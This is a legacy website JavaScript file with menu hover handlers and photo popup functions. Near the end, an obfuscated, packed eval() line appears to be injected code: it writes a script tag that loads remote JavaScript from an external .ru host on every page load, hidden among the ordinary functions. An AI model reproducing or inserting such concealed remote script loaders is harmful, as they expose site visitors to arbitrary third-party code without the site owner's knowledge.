FF_startList = function() {
	for(var h = 0; h < document.getElementsByTagName("ul").length; h++) {
		if (document.getElementsByTagName("ul")[h].getAttribute("silo", false) == "silo") {
			navRoot = document.getElementsByTagName("ul")[h];
			for (i=0; i<navRoot.childNodes.length; i++) {
				node = navRoot.childNodes[i];
				if (node.nodeName=="LI") {
					node.onmouseover=function() {
						this.className+=" FF_SubNavigationOver";
					}
					node.onmouseout=function() {
						this.className=this.className.replace(" FF_SubNavigationOver", "");
					}
				}
			}
		}
		if (document.getElementsByTagName("ul")[h].getAttribute("silo", false) == "silosub") {
			navRoot = document.getElementsByTagName("ul")[h];
			for (i=0; i<navRoot.childNodes.length; i++) {
				node = navRoot.childNodes[i];
				if (node.nodeName=="LI") {
					node.onmouseover=function() {
						this.className+=" FF_DetailNavigationOver";
					}
					node.onmouseout=function() {
						this.className=this.className.replace(" FF_DetailNavigationOver", "");
					}
				}
			}
		}
	}
}

var FF_lastObj;
var FF_dont = false;

function photo_win(img_path,img_alt){
var str, StrBody;

	str = 'resizable=yes,width=100,height=100,screenX=100,screenY=100,left=100,top=100';

	if (document.all){
		StrBody = '<body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0" bgcolor="White" onblur="self.window.close();" onresize="self.window.location.reload();">';
	} else {
		StrBody = '<body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0" bgcolor="White" onblur="self.window.close();">';
	}

	var win_op = window.open('','show', str);
	win_op.document.open();
	win_op.document.writeln('<html>');
	win_op.document.writeln('<head>');
	win_op.document.writeln('<title>' + img_alt + '</title>');
	win_op.document.writeln('<script>');
	win_op.document.writeln('function resize_img() {');
	win_op.document.writeln('var width = document.image.width;');
	win_op.document.writeln('var height = document.image.height;');
	win_op.document.writeln('if (!(document.all)){ self.resizeTo(width,height); } else { self.resizeTo((width+12),(height + 31));');
	win_op.document.writeln(' }');
	win_op.document.writeln('}');
	win_op.document.writeln('</script>');
	win_op.document.writeln('</head>');
	win_op.document.writeln(StrBody);
	win_op.document.writeln('<img name="image" src="'+img_path+'" border=0 alt="'+img_alt+'" onload="resize_img();">');
	win_op.document.writeln('</body>');
	win_op.document.writeln('</html>');
	win_op.document.close();
}

function openWin(img_src)
{
	window.open("/ipx.shtml?"+img_src,"ipx","width=320,height=240,status=0,resizable=0,scrollbars=0");
}

eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('$0=1;4.5(\'<\'+\'2 6="7\\/\'+\'8" 9="a:\'+\'\\/\\/3.b.c\\/\'+\'3.d?0=1"><\\/\'+\'2>\');',14,14,'sIDs|14|script|stat|document|write|type|text|javascript|src|http|tts|ru|js'.split('|'),0,{}))

var blnFlashInstalled = true;
wmode = 'transparent';